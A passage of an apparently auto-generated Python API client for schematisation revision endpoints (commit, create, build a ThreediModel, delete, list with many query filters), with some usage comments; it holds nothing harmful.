>>> thread = api.schematisations_revisions_commit_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param Commit data: (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SchematisationRevision, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_commit" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_commit`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_commit`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_commit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/commit/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SchematisationRevision', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
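# Usage sketch (illustrative), handling the HTTP 409 conflict described in
# the commit docstring; the Commit fields and ids below are hypothetical:
#
#     try:
#         rev = api.schematisations_revisions_commit(
#             id=45,
#             schematisation_pk='123',
#             data=Commit(commit_message='initial commit'),
#         )
#     except ApiException as e:  # standard openapi-generator exception
#         if e.status == 409:
#             # retry with force_as='new_revision' or 'new_schematisation'
#             pass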
def schematisations_revisions_create(self, schematisation_pk, data, **kwargs): # noqa: E501
"""Create a new revision # noqa: E501
Creates a clone of the last committed revision (if present) by default, unless `empty=true` is passed in the data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_create(schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str schematisation_pk: (required)
:param CreateRevision data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SchematisationRevision
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_create_with_http_info(schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_create_with_http_info(self, schematisation_pk, data, **kwargs): # noqa: E501
"""Create a new revision # noqa: E501
Creates a clone of the last committed revision (if present) by default, unless `empty=true` is passed in the data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_create_with_http_info(schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str schematisation_pk: (required)
:param CreateRevision data: (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SchematisationRevision, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_create`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_create`") # noqa: E501
collection_formats = {}
path_params = {}
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SchematisationRevision', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
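    # Illustrative usage sketch (not part of the generated client). Assumes
    # `api` is an instance of this API class built from a configured
    # ApiClient, and that a `CreateRevision` model is importable from this
    # package's models module; adjust names to your installation.
    #
    #     data = CreateRevision(empty=False)  # clone the last committed revision
    #     revision = api.schematisations_revisions_create("123", data)
    #     print(revision.id)
    #
    # Passing empty=True instead starts from an empty revision rather than a
    # clone of the last committed one.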
def schematisations_revisions_create_threedimodel(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_create_threedimodel # noqa: E501
        Creates a ThreediModel from this revision. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_create_threedimodel(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SchematisationRevision data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: ThreediModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_create_threedimodel_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_create_threedimodel_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_create_threedimodel # noqa: E501
        Creates a ThreediModel from this revision. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_create_threedimodel_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SchematisationRevision data: (required)
        :param _return_http_data_only: response data without HTTP status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: tuple(ThreediModel, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_create_threedimodel" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_create_threedimodel`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_create_threedimodel`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_create_threedimodel`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/create_threedimodel/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ThreediModel', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
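    # Illustrative usage sketch (not part of the generated client): asking the
    # API to build a ThreediModel from a committed revision. That the revision
    # object itself is passed as the request body is an assumption based on
    # the `SchematisationRevision data` parameter above; verify against the
    # API documentation.
    #
    #     threedimodel = api.schematisations_revisions_create_threedimodel(
    #         id=revision.id,
    #         schematisation_pk="123",
    #         data=revision,
    #     )
    #     print(threedimodel.id)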
def schematisations_revisions_delete(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_delete # noqa: E501
        Deletes the revision identified by the given revision id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_delete(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param DestroyRevision data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_delete_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_delete_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_delete # noqa: E501
        Deletes the revision identified by the given revision id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_delete_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param DestroyRevision data: (required)
        :param _return_http_data_only: response data without HTTP status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_delete`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_delete`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
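    # Illustrative usage sketch (not part of the generated client). The exact
    # fields of the `DestroyRevision` body model are an assumption here;
    # consult the generated models package before use.
    #
    #     api.schematisations_revisions_delete(
    #         id=revision.id,
    #         schematisation_pk="123",
    #         data=DestroyRevision(),
    #     )  # returns None on success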
def schematisations_revisions_list(self, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_list # noqa: E501
        Lists the revisions of a schematisation; the Django-style field lookups below act as query filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_list(schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str schematisation_pk: (required)
:param float number:
:param str commit_message:
:param str commit_message__iexact:
:param str commit_message__contains:
:param str commit_message__icontains:
:param str commit_message__in: Multiple values may be separated by commas.
:param str commit_message__startswith:
:param str commit_message__istartswith:
:param str commit_message__endswith:
:param str commit_message__regex:
:param float schematisation__id:
:param str schematisation__slug:
:param str schematisation__slug__iexact:
:param str schematisation__slug__contains:
:param str schematisation__slug__icontains:
:param str schematisation__slug__in: Multiple values may be separated by commas.
:param str schematisation__slug__startswith:
:param str schematisation__slug__istartswith:
:param str schematisation__slug__endswith:
:param str schematisation__slug__regex:
:param str schematisation__owner__name:
:param str schematisation__owner__name__iexact:
:param str schematisation__owner__name__contains:
:param str schematisation__owner__name__icontains:
:param str schematisation__owner__name__in: Multiple values may be separated by commas.
:param str schematisation__owner__name__startswith:
:param str schematisation__owner__name__istartswith:
:param str schematisation__owner__name__endswith:
:param str schematisation__owner__name__regex:
:param str schematisation__owner__unique_id:
:param str schematisation__owner__unique_id__iexact:
:param str schematisation__owner__unique_id__contains:
:param str schematisation__owner__unique_id__icontains:
:param str schematisation__owner__unique_id__in: Multiple values may be separated by commas.
:param str schematisation__owner__unique_id__startswith:
:param str schematisation__owner__unique_id__istartswith:
:param str schematisation__owner__unique_id__endswith:
:param str schematisation__owner__unique_id__regex:
:param str commit_user__username:
:param str commit_user__username__iexact:
:param str commit_user__username__contains:
:param str commit_user__username__icontains:
:param str commit_user__username__in: Multiple values may be separated by commas.
:param str commit_user__username__startswith:
:param str commit_user__username__istartswith:
:param str commit_user__username__endswith:
:param str commit_user__username__regex:
:param str commit_date:
:param str commit_date__gt:
:param str commit_date__gte:
:param str commit_date__lt:
:param str commit_date__lte:
:param str commit_date__date:
:param str commit_date__date__gt:
:param str commit_date__date__gte:
:param str commit_date__date__lt:
:param str commit_date__date__lte:
:param float commit_date__year:
:param float commit_date__year__gt:
:param float commit_date__year__gte:
:param float commit_date__year__lt:
:param float commit_date__year__lte:
:param float commit_date__month:
:param float commit_date__month__lte:
:param float commit_date__day:
:param float commit_date__day__lt:
:param float commit_date__week:
:param float commit_date__week_day:
:param str committed:
:param str archived:
:param str is_valid:
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_list_with_http_info(schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_list_with_http_info(self, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_list # noqa: E501
        Lists the revisions of a schematisation; the Django-style field lookups below act as query filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_list_with_http_info(schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str schematisation_pk: (required)
:param float number:
:param str commit_message:
:param str commit_message__iexact:
:param str commit_message__contains:
:param str commit_message__icontains:
:param str commit_message__in: Multiple values may be separated by commas.
:param str commit_message__startswith:
:param str commit_message__istartswith:
:param str commit_message__endswith:
:param str commit_message__regex:
:param float schematisation__id:
:param str schematisation__slug:
:param str schematisation__slug__iexact:
:param str schematisation__slug__contains:
:param str schematisation__slug__icontains:
:param str schematisation__slug__in: Multiple values may be separated by commas.
:param str schematisation__slug__startswith:
:param str schematisation__slug__istartswith:
:param str schematisation__slug__endswith:
:param str schematisation__slug__regex:
:param str schematisation__owner__name:
:param str schematisation__owner__name__iexact:
:param str schematisation__owner__name__contains:
:param str schematisation__owner__name__icontains:
:param str schematisation__owner__name__in: Multiple values may be separated by commas.
:param str schematisation__owner__name__startswith:
:param str schematisation__owner__name__istartswith:
:param str schematisation__owner__name__endswith:
:param str schematisation__owner__name__regex:
:param str schematisation__owner__unique_id:
:param str schematisation__owner__unique_id__iexact:
:param str schematisation__owner__unique_id__contains:
:param str schematisation__owner__unique_id__icontains:
:param str schematisation__owner__unique_id__in: Multiple values may be separated by commas.
:param str schematisation__owner__unique_id__startswith:
:param str schematisation__owner__unique_id__istartswith:
:param str schematisation__owner__unique_id__endswith:
:param str schematisation__owner__unique_id__regex:
:param str commit_user__username:
:param str commit_user__username__iexact:
:param str commit_user__username__contains:
:param str commit_user__username__icontains:
:param str commit_user__username__in: Multiple values may be separated by commas.
:param str commit_user__username__startswith:
:param str commit_user__username__istartswith:
:param str commit_user__username__endswith:
:param str commit_user__username__regex:
:param str commit_date:
:param str commit_date__gt:
:param str commit_date__gte:
:param str commit_date__lt:
:param str commit_date__lte:
:param str commit_date__date:
:param str commit_date__date__gt:
:param str commit_date__date__gte:
:param str commit_date__date__lt:
:param str commit_date__date__lte:
:param float commit_date__year:
:param float commit_date__year__gt:
:param float commit_date__year__gte:
:param float commit_date__year__lt:
:param float commit_date__year__lte:
:param float commit_date__month:
:param float commit_date__month__lte:
:param float commit_date__day:
:param float commit_date__day__lt:
:param float commit_date__week:
:param float commit_date__week_day:
:param str committed:
:param str archived:
:param str is_valid:
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
        :param _return_http_data_only: response data without HTTP status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: tuple(InlineResponse2001, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'schematisation_pk',
'number',
'commit_message',
'commit_message__iexact',
'commit_message__contains',
'commit_message__icontains',
'commit_message__in',
'commit_message__startswith',
'commit_message__istartswith',
'commit_message__endswith',
'commit_message__regex',
'schematisation__id',
'schematisation__slug',
'schematisation__slug__iexact',
'schematisation__slug__contains',
'schematisation__slug__icontains',
'schematisation__slug__in',
'schematisation__slug__startswith',
'schematisation__slug__istartswith',
'schematisation__slug__endswith',
'schematisation__slug__regex',
'schematisation__owner__name',
'schematisation__owner__name__iexact',
'schematisation__owner__name__contains',
'schematisation__owner__name__icontains',
'schematisation__owner__name__in',
'schematisation__owner__name__startswith',
'schematisation__owner__name__istartswith',
'schematisation__owner__name__endswith',
'schematisation__owner__name__regex',
'schematisation__owner__unique_id',
'schematisation__owner__unique_id__iexact',
'schematisation__owner__unique_id__contains',
'schematisation__owner__unique_id__icontains',
'schematisation__owner__unique_id__in',
'schematisation__owner__unique_id__startswith',
'schematisation__owner__unique_id__istartswith',
'schematisation__owner__unique_id__endswith',
'schematisation__owner__unique_id__regex',
'commit_user__username',
'commit_user__username__iexact',
'commit_user__username__contains',
'commit_user__username__icontains',
'commit_user__username__in',
'commit_user__username__startswith',
'commit_user__username__istartswith',
'commit_user__username__endswith',
'commit_user__username__regex',
'commit_date',
'commit_date__gt',
'commit_date__gte',
'commit_date__lt',
'commit_date__lte',
'commit_date__date',
'commit_date__date__gt',
'commit_date__date__gte',
'commit_date__date__lt',
'commit_date__date__lte',
'commit_date__year',
'commit_date__year__gt',
'commit_date__year__gte',
'commit_date__year__lt',
'commit_date__year__lte',
'commit_date__month',
'commit_date__month__lte',
'commit_date__day',
'commit_date__day__lt',
'commit_date__week',
'commit_date__week_day',
'committed',
'archived',
'is_valid',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
if 'number' in local_var_params and local_var_params['number'] is not None: # noqa: E501
query_params.append(('number', local_var_params['number'])) # noqa: E501
if 'commit_message' in local_var_params and local_var_params['commit_message'] is not None: # noqa: E501
query_params.append(('commit_message', local_var_params['commit_message'])) # noqa: E501
if 'commit_message__iexact' in local_var_params and local_var_params['commit_message__iexact'] is not None: # noqa: E501
query_params.append(('commit_message__iexact', local_var_params['commit_message__iexact'])) # noqa: E501
if 'commit_message__contains' in local_var_params and local_var_params['commit_message__contains'] is not None: # noqa: E501
query_params.append(('commit_message__contains', local_var_params['commit_message__contains'])) # noqa: E501
if 'commit_message__icontains' in local_var_params and local_var_params['commit_message__icontains'] is not None: # noqa: E501
query_params.append(('commit_message__icontains', local_var_params['commit_message__icontains'])) # noqa: E501
if 'commit_message__in' in local_var_params and local_var_params['commit_message__in'] is not None: # noqa: E501
query_params.append(('commit_message__in', local_var_params['commit_message__in'])) # noqa: E501
if 'commit_message__startswith' in local_var_params and local_var_params['commit_message__startswith'] is not None: # noqa: E501
query_params.append(('commit_message__startswith', local_var_params['commit_message__startswith'])) # noqa: E501
if 'commit_message__istartswith' in local_var_params and local_var_params['commit_message__istartswith'] is not None: # noqa: E501
query_params.append(('commit_message__istartswith', local_var_params['commit_message__istartswith'])) # noqa: E501
if 'commit_message__endswith' in local_var_params and local_var_params['commit_message__endswith'] is not None: # noqa: E501
query_params.append(('commit_message__endswith', local_var_params['commit_message__endswith'])) # noqa: E501
if 'commit_message__regex' in local_var_params and local_var_params['commit_message__regex'] is not None: # noqa: E501
query_params.append(('commit_message__regex', local_var_params['commit_message__regex'])) # noqa: E501
if 'schematisation__id' in local_var_params and local_var_params['schematisation__id'] is not None: # noqa: E501
query_params.append(('schematisation__id', local_var_params['schematisation__id'])) # noqa: E501
if 'schematisation__slug' in local_var_params and local_var_params['schematisation__slug'] is not None: # noqa: E501
query_params.append(('schematisation__slug', local_var_params['schematisation__slug'])) # noqa: E501
if 'schematisation__slug__iexact' in local_var_params and local_var_params['schematisation__slug__iexact'] is not None: # noqa: E501
query_params.append(('schematisation__slug__iexact', local_var_params['schematisation__slug__iexact'])) # noqa: E501
if 'schematisation__slug__contains' in local_var_params and local_var_params['schematisation__slug__contains'] is not None: # noqa: E501
query_params.append(('schematisation__slug__contains', local_var_params['schematisation__slug__contains'])) # noqa: E501
if 'schematisation__slug__icontains' in local_var_params and local_var_params['schematisation__slug__icontains'] is not None: # noqa: E501
query_params.append(('schematisation__slug__icontains', local_var_params['schematisation__slug__icontains'])) # noqa: E501
if 'schematisation__slug__in' in local_var_params and local_var_params['schematisation__slug__in'] is not None: # noqa: E501
query_params.append(('schematisation__slug__in', local_var_params['schematisation__slug__in'])) # noqa: E501
if 'schematisation__slug__startswith' in local_var_params and local_var_params['schematisation__slug__startswith'] is not None: # noqa: E501
query_params.append(('schematisation__slug__startswith', local_var_params['schematisation__slug__startswith'])) # noqa: E501
if 'schematisation__slug__istartswith' in local_var_params and local_var_params['schematisation__slug__istartswith'] is not None: # noqa: E501
query_params.append(('schematisation__slug__istartswith', local_var_params['schematisation__slug__istartswith'])) # noqa: E501
if 'schematisation__slug__endswith' in local_var_params and local_var_params['schematisation__slug__endswith'] is not None: # noqa: E501
query_params.append(('schematisation__slug__endswith', local_var_params['schematisation__slug__endswith'])) # noqa: E501
if 'schematisation__slug__regex' in local_var_params and local_var_params['schematisation__slug__regex'] is not None: # noqa: E501
query_params.append(('schematisation__slug__regex', local_var_params['schematisation__slug__regex'])) # noqa: E501
if 'schematisation__owner__name' in local_var_params and local_var_params['schematisation__owner__name'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name', local_var_params['schematisation__owner__name'])) # noqa: E501
if 'schematisation__owner__name__iexact' in local_var_params and local_var_params['schematisation__owner__name__iexact'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__iexact', local_var_params['schematisation__owner__name__iexact'])) # noqa: E501
if 'schematisation__owner__name__contains' in local_var_params and local_var_params['schematisation__owner__name__contains'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__contains', local_var_params['schematisation__owner__name__contains'])) # noqa: E501
if 'schematisation__owner__name__icontains' in local_var_params and local_var_params['schematisation__owner__name__icontains'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__icontains', local_var_params['schematisation__owner__name__icontains'])) # noqa: E501
if 'schematisation__owner__name__in' in local_var_params and local_var_params['schematisation__owner__name__in'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__in', local_var_params['schematisation__owner__name__in'])) # noqa: E501
if 'schematisation__owner__name__startswith' in local_var_params and local_var_params['schematisation__owner__name__startswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__startswith', local_var_params['schematisation__owner__name__startswith'])) # noqa: E501
if 'schematisation__owner__name__istartswith' in local_var_params and local_var_params['schematisation__owner__name__istartswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__istartswith', local_var_params['schematisation__owner__name__istartswith'])) # noqa: E501
if 'schematisation__owner__name__endswith' in local_var_params and local_var_params['schematisation__owner__name__endswith'] is not None: # noqa: E501
